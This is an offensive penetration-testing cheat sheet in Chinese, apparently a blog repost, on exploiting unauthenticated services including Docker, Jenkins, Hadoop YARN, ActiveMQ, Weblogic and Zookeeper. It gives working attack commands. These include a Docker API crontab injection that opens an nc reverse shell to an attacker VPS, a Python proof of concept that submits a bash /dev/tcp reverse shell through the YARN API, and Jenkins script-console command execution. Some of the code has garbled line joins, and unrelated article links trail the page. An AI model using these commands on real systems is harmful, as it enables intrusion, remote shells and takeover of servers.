当前位置: 首页 > news >正文

WEB渗透-未授权访问篇

news 来源:原创 2024/9/20 7:10:52

 WEB渗透未授权访问篇-Redis-CSDN博客

activemq

默认端口8161,默认账户密码admin/admin http://1.1.1.1:8161/admin/connections.jsp

PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 1.1.1.1:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=
123123123123123123123123123

CouchDB

开源数据库,默认端口5984,SSL端口6984

curl 192.168.1.10:5984
curl 192.168.1.10:5984/_config

Docker

默认端口237

docker -H tcp://1.1.1.1:2375 images

本地监听 启动容器

docker -H tcp://1.1.1.1:2375 run -id -v /etc/crontabs:/tmp alpine:latest
docker -H tcp://1.1.1.1:2375 ps

进入容器

docker -H tcp://1.1.1.1:2375 exec -it a8ff7ed880fb sh

echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务
cat /tmp/root 
exit

Shipyard默认密码 admin/shipyard

Elastic

默认端口9200

http://1.1.1.1:9200/_plugin/head/
http://1.1.1.1:9200/_nodes
http://1.1.1.1:9200/_river
http://1.1.1.1:9200/_plugin/sql/

jboss

http://192.168.1.1:8080/jmx-console/ 无需认证进入
jboss.deployment部署shell
addURL()的paramValue写入远程war木马地址

Jenkins

http://<target>:8080/manage
http://<target>:8080/script

执行系统命令

println "whoami".execute().text

hadoop

http://192.168.1.1:8088/cluster
本地监听端口 >> 创建Application >> 调用Submit Application API提交

poc

#!/usr/bin/env python
import requeststarget = 'http://192.168.18.129:8088/'
lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN',
}
requests.post(url, json=data)

memcache

默认端口11211
>telnet 1.1.1.1 11211
>nc -vv 1.1.1.1 11211

mongo

默认端口27017直接连接进行增删改查
连接工具
https://s3.mongobooster.com/download/releasesv5/nosqlbooster4mongo-5.1.12.exe

VNC

默认端口 5900、5901

Solr

solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等

http://xx/solr/admin
https://xx/solr/admin

Weblogic

J2EE应用服务器,默认端口7001 访问URL,直接打开后台页面


http://192.168.1.10:7001/console/css/%252e%252e%252fconsole.portal

Zabbix

服务器监控软件,默认端口10051
无需账户密码直接访问zabbix页面

zookeeper

默认端口2181 获得服务器环境信息

>echo envi|nc 192.168.0.1 2181
连接
>./zkCli.sh -server ip:port
连接工具
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 图像处理案例03
  • 深度学习与图像修复:ADetailer插件在Stable Diffusion中的应用
  • 【JavaEE初阶】JUC(java.uitl.concurrent)的常见类
  • Java Server-Sent Event 服务端发送事件
  • [FSCTF 2023]细狗2.0
  • 力扣热题100_二叉树_94_二叉树的中序遍历
  • C语言中常用的函数
  • python自动化笔记:excel文件处理及日志收集
  • 列式数据库(HBase) 中实现表与表的关联
  • 区块链(Blockchain)
  • 【代码随想录】长度最小的子数组——滑动窗口
  • 第二十一节、敌人追击状态的转换
  • 【K8S】K8S架构及相关组件
  • PHP反序列化POP链构造:理解与利用
  • IT运维岗适用的6本证书
  • 《网管员必读——网络组建》(第2版)电子课件下载
  • 2018以太坊智能合约编程语言solidity的最佳IDEs
  • AHK 中 = 和 == 等比较运算符的用法
  • co.js - 让异步代码同步化
  •  D - 粉碎叛乱F - 其他起义
  • hadoop集群管理系统搭建规划说明
  • HTML中设置input等文本框为不可操作
  • Material Design
  • Python学习之路16-使用API
  • Sublime Text 2/3 绑定Eclipse快捷键
  • TypeScript实现数据结构(一)栈,队列,链表
  • vue.js框架原理浅析
  • 阿里云Kubernetes容器服务上体验Knative
  • 利用jquery编写加法运算验证码
  • 马上搞懂 GeoJSON
  • 每天一个设计模式之命令模式
  • 嵌入式文件系统
  • 如何编写一个可升级的智能合约
  • 小程序上传图片到七牛云(支持多张上传,预览,删除)
  • 小而合理的前端理论:rscss和rsjs
  • 新手搭建网站的主要流程
  • # 飞书APP集成平台-数字化落地
  • #1014 : Trie树
  • #define
  • #NOIP 2014#day.2 T1 无限网络发射器选址
  • #stm32驱动外设模块总结w5500模块
  • $.ajax()方法详解
  • %3cscript放入php,跟bWAPP学WEB安全(PHP代码)--XSS跨站脚本攻击
  • (23)Linux的软硬连接
  • (C语言)fgets与fputs函数详解
  • (NO.00004)iOS实现打砖块游戏(十二):伸缩自如,我是如意金箍棒(上)!
  • (阿里云万网)-域名注册购买实名流程
  • (八)Flink Join 连接
  • (第一天)包装对象、作用域、创建对象
  • (附源码)springboot“微印象”在线打印预约系统 毕业设计 061642
  • (附源码)计算机毕业设计ssm基于Internet快递柜管理系统
  • (三) prometheus + grafana + alertmanager 配置Redis监控
  • (三)uboot源码分析
  • (学习日记)2024.04.10:UCOSIII第三十八节:事件实验
  • (一)spring cloud微服务分布式云架构 - Spring Cloud简介